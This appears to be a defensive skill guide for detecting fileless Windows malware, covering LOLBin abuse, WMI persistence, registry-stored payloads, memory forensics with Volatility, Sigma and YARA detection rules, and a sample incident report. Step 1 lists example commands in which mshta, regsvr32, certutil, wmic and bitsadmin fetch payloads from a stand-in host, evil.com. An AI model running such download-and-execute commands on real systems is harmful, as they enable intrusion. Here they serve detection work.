--- name: detecting-fileless-malware-techniques description: 'Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination. ' domain: cybersecurity subdomain: malware-analysis tags: - malware - fileless - LOLBins - memory-analysis - detection version: 1.0.0 author: mahipal license: Apache-2.0 d3fend_techniques: - Executable Denylisting - Execution Isolation - File Metadata Consistency Validation - Content Format Conversion - File Content Analysis nist_csf: - DE.AE-02 - RS.AN-03 - ID.RA-01 - DE.CM-01 --- # Detecting Fileless Malware Techniques ## When to Use - EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32) - Investigating attacks that leave no traditional malware files on disk - Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence - Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments - Memory forensics reveals malicious code but no corresponding files exist on the filesystem **Do not use** for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware. ## Prerequisites - Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes) - PowerShell Script Block Logging and Module Logging enabled - Volatility 3 for memory forensics of fileless malware artifacts - Process Monitor (ProcMon) for real-time system activity monitoring - Windows Event Log access with adequate retention policies - Autoruns for identifying persistence mechanisms ## Workflow ### Step 1: Identify LOLBin Usage Detect abuse of legitimate Windows binaries for malicious purposes: ``` Commonly Abused LOLBins and Detection Patterns: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ mshta.exe: Abuse: Execute HTA files with embedded VBScript/JScript Example: mshta http://evil.com/payload.hta Example: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -enc ...""") Detect: mshta.exe with URL argument or vbscript: prefix regsvr32.exe: Abuse: Load scriptlets via COM (.sct files) - "Squiblydoo" Example: regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll Detect: regsvr32.exe with /i: URL parameter certutil.exe: Abuse: Download files, decode Base64 Example: certutil -urlcache -split -f http://evil.com/payload.exe Example: certutil -decode encoded.txt payload.exe Detect: certutil.exe with -urlcache or -decode arguments rundll32.exe: Abuse: Execute DLL functions, JavaScript Example: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";... Detect: rundll32.exe with javascript: argument wmic.exe: Abuse: Execute code via XSL stylesheets Example: wmic process get brief /format:"http://evil.com/payload.xsl" Detect: wmic.exe with /format: URL parameter bitsadmin.exe: Abuse: Download files via BITS Example: bitsadmin /transfer job http://evil.com/payload.exe C:\Temp\p.exe Detect: bitsadmin.exe with /transfer or /addfile to external URL cmstp.exe: Abuse: Execute commands via INF file Example: cmstp.exe /ni /s payload.inf Detect: cmstp.exe execution from non-standard locations ``` ### Step 2: Detect WMI-Based Persistence Analyze WMI event subscriptions used for fileless persistence: ```bash # List WMI event subscriptions (filters, consumers, bindings) wmic /namespace:"\\root\subscription" path __EventFilter get Name,Query /format:list wmic /namespace:"\\root\subscription" path CommandLineEventConsumer get Name,CommandLineTemplate /format:list wmic /namespace:"\\root\subscription" path ActiveScriptEventConsumer get Name,ScriptText /format:list wmic /namespace:"\\root\subscription" path __FilterToConsumerBinding get Filter,Consumer /format:list # PowerShell enumeration of WMI subscriptions Get-WMIObject -Namespace root\Subscription -Class __EventFilter Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ``` ```python # Parse Sysmon WMI events (Event IDs 19, 20, 21) import subprocess import xml.etree.ElementTree as ET # WMI Event Filter creation (EID 19) result = subprocess.run( ["wevtutil", "qe", "Microsoft-Windows-Sysmon/Operational", "/q:*[System[EventID=19 or EventID=20 or EventID=21]]", "/f:xml", "/c:50"], capture_output=True, text=True ) ns = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"} for event_xml in result.stdout.split(""): if not event_xml.strip(): continue try: root = ET.fromstring(event_xml + "") eid = root.find(".//e:System/e:EventID", ns).text data = {} for d in root.findall(".//e:EventData/e:Data", ns): data[d.get("Name")] = d.text if eid == "19": print(f"[!] WMI Filter Created: {data.get('Name')}") print(f" Query: {data.get('Query')}") elif eid == "20": print(f"[!] WMI Consumer Created: {data.get('Name')}") print(f" Type: {data.get('Type')}") print(f" Destination: {data.get('Destination')}") elif eid == "21": print(f"[!] WMI Binding Created") print(f" Consumer: {data.get('Consumer')}") print(f" Filter: {data.get('Filter')}") except: pass ``` ### Step 3: Detect Registry-Resident Payloads Find malicious code stored in the Windows Registry: ```bash # Common registry locations for fileless payloads reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s reg query "HKCU\Environment" /s # Check for PowerShell encoded commands in registry values # Malware stores Base64-encoded payloads in custom registry keys reg query "HKCU\Software" /s /f "powershell" 2>nul reg query "HKCU\Software" /s /f "-enc" 2>nul # Check for large registry values (possible stored payloads) python3 << 'PYEOF' import winreg import base64 suspicious_keys = [ (winreg.HKEY_CURRENT_USER, r"Software"), (winreg.HKEY_LOCAL_MACHINE, r"Software"), ] def scan_registry(hive, path, depth=0): if depth > 3: return try: key = winreg.OpenKey(hive, path) i = 0 while True: try: name, value, vtype = winreg.EnumValue(key, i) if isinstance(value, str) and len(value) > 500: # Check for Base64-encoded content try: decoded = base64.b64decode(value[:100]) print(f"[!] Large Base64 value: {path}\\{name} ({len(value)} bytes)") except: pass # Check for PowerShell keywords if any(kw in value.lower() for kw in ["powershell", "invoke", "iex", "-enc"]): print(f"[!] PowerShell in registry: {path}\\{name}") i += 1 except WindowsError: break # Recurse into subkeys j = 0 while True: try: subkey = winreg.EnumKey(key, j) scan_registry(hive, f"{path}\\{subkey}", depth + 1) j += 1 except WindowsError: break except: pass for hive, path in suspicious_keys: scan_registry(hive, path) PYEOF ``` ### Step 4: Analyze Memory for Fileless Artifacts Use memory forensics to find in-memory-only malware: ```bash # Process with injected code (no backing file) vol3 -f memory.dmp windows.malfind # Check for .NET assemblies loaded from memory (not from disk files) vol3 -f memory.dmp windows.vadinfo --pid 4012 | grep -i "PAGE_EXECUTE" # PowerShell CLR usage (indicates .NET reflection loading) vol3 -f memory.dmp windows.cmdline | grep -i "powershell" # Scan for known fileless frameworks vol3 -f memory.dmp yarascan.YaraScan --yara-rules " rule Fileless_PowerShell { strings: \$s1 = \"System.Reflection.Assembly\" ascii wide \$s2 = \"[System.Convert]::FromBase64String\" ascii wide \$s3 = \"Invoke-Expression\" ascii wide \$s4 = \"DownloadString\" ascii wide condition: 2 of them } " # Extract PowerShell command history from memory vol3 -f memory.dmp windows.cmdline strings memory.dmp | grep -i "invoke-\|iex \|downloadstring\|-encodedcommand" ``` ### Step 5: Build Comprehensive Detection Rules Create detection content for fileless techniques: ```yaml # Sigma rule: LOLBin execution with network activity title: Suspicious LOLBin Execution with Network Arguments logsource: category: process_creation product: windows detection: selection_mshta: Image|endswith: '\mshta.exe' CommandLine|contains: - 'http' - 'vbscript:' - 'javascript:' selection_certutil: Image|endswith: '\certutil.exe' CommandLine|contains: - '-urlcache' - '-decode' selection_regsvr32: Image|endswith: '\regsvr32.exe' CommandLine|contains: '/i:http' selection_wmic: Image|endswith: '\wmic.exe' CommandLine|contains: '/format:http' condition: selection_mshta or selection_certutil or selection_regsvr32 or selection_wmic level: high ``` ```yaml # Sigma rule: WMI persistence creation title: WMI Event Subscription for Persistence logsource: product: windows service: sysmon detection: selection: EventID: - 19 # WMI EventFilter - 20 # WMI EventConsumer - 21 # WMI FilterConsumerBinding condition: selection level: medium ``` ### Step 6: Document Fileless Attack Chain Map the complete fileless attack lifecycle: ``` Typical Fileless Attack Chain: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━ Phase 1 - Initial Access: Email -> Macro -> mshta.exe/PowerShell (LOLBin abuse) OR Web exploit -> regsvr32/certutil (scriptlet download) Phase 2 - Execution: PowerShell downloads and executes script in memory .NET Assembly.Load() for reflective loading WMI process creation for lateral movement Phase 3 - Persistence: WMI event subscription (survives reboots) Registry-stored encoded payload (loaded by Run key) Scheduled task executing inline PowerShell Phase 4 - Privilege Escalation: PowerShell with Invoke-Mimikatz (in-memory credential theft) Named pipe impersonation via WMI Phase 5 - Lateral Movement: WMI remote process creation (no file transfer needed) PowerShell remoting (WinRM) PsExec via WMI Phase 6 - Exfiltration: PowerShell HTTP POST to C2 DNS tunneling via Invoke-DNSExfiltration Cloud storage API (OneDrive, Google Drive) ``` ## Key Concepts | Term | Definition | |------|------------| | **Fileless Malware** | Malware operating entirely in memory or within legitimate system tools without creating traditional executable files on disk | | **LOLBins (Living Off the Land Binaries)** | Legitimate system binaries (mshta, regsvr32, certutil) abused by attackers to execute malicious code while evading application whitelisting | | **WMI Event Subscription** | Windows Management Instrumentation persistence mechanism using event filters, consumers, and bindings to execute code on system events | | **Registry-Resident Payload** | Malicious code stored as encoded data in Windows Registry values, loaded and executed by a small stub in a Run key | | **Reflective Loading** | Loading .NET assemblies or PE files from byte arrays in memory using Assembly.Load() without writing to disk | | **In-Memory Execution** | Running code directly in RAM without creating files, leveraging process injection, reflective loading, or script interpreters | | **Script Block Logging** | Windows PowerShell logging feature (Event ID 4104) that captures script content after deobfuscation, essential for fileless threat visibility | ## Tools & Systems - **Sysmon**: System Monitor providing detailed event logging for process creation, WMI events, registry changes, and network connections - **Autoruns**: Sysinternals tool showing all auto-start locations including WMI subscriptions, scheduled tasks, and registry entries - **Volatility**: Memory forensics framework for detecting in-memory code, injected processes, and fileless malware artifacts - **Process Monitor**: Real-time monitoring of file system, registry, and process activity for observing fileless attack behavior - **LOLBAS Project**: Community-documented catalog of LOLBin abuse techniques at https://lolbas-project.github.io/ ## Common Scenarios ### Scenario: Investigating a Fileless Attack Using WMI Persistence **Context**: Sysmon alerts show WMI event subscription creation followed by periodic PowerShell execution without any corresponding malware files on disk. The attack persists across reboots. **Approach**: 1. Query WMI namespace for event filters, consumers, and bindings to identify the persistence mechanism 2. Extract the CommandLineEventConsumer or ActiveScriptEventConsumer payload 3. Decode the PowerShell command (typically Base64-encoded with -enc flag) 4. Trace the PowerShell execution in Script Block Logging (Event ID 4104) for the full deobfuscated payload 5. Analyze memory dump for reflectively loaded assemblies and injected code 6. Check registry for additional stored payloads referenced by the PowerShell script 7. Map the complete attack chain from initial access through persistence and lateral movement **Pitfalls**: - Not having Sysmon WMI event logging enabled (Events 19/20/21) before the incident - Rebooting the system before capturing a memory dump (destroys in-memory evidence) - Focusing only on file-based IOCs when the attack is entirely fileless - Missing the initial access vector because the LOLBin execution left minimal traces ## Output Format ``` FILELESS MALWARE ANALYSIS REPORT =================================== Incident: INC-2025-2847 Attack Type: Fileless (no malware files on disk) INITIAL ACCESS Vector: Phishing email with macro-enabled document LOLBin Chain: WINWORD.EXE -> mshta.exe -> powershell.exe PERSISTENCE MECHANISM Type: WMI Event Subscription Filter Name: WindowsUpdateCheck Filter Query: SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' Consumer: CommandLineEventConsumer Command: powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAA... DECODED PAYLOAD [Layer 1] Base64 UTF-16LE decode [Layer 2] AMSI bypass + Assembly.Load() of embedded .NET payload [Layer 3] .NET RAT with C2 communication to 185.220.101[.]42 REGISTRY PAYLOADS HKCU\Software\AppDataLow\Config\data = [Base64 encoded .NET assembly, 247KB] Loaded by: PowerShell WMI consumer script MEMORY ARTIFACTS PID 4012 (powershell.exe): Injected .NET assembly at 0x00400000 - CobaltStrike beacon detected via YARA - C2: hxxps://185.220.101[.]42/updates EXTRACTED IOCs C2 IP: 185.220.101[.]42 WMI Filter: WindowsUpdateCheck Registry Path: HKCU\Software\AppDataLow\Config\data PowerShell Flags: -nop -w hidden -enc MITRE ATT&CK T1059.001 PowerShell T1546.003 WMI Event Subscription T1218.005 Mshta T1112 Modify Registry T1055.012 Process Hollowing ```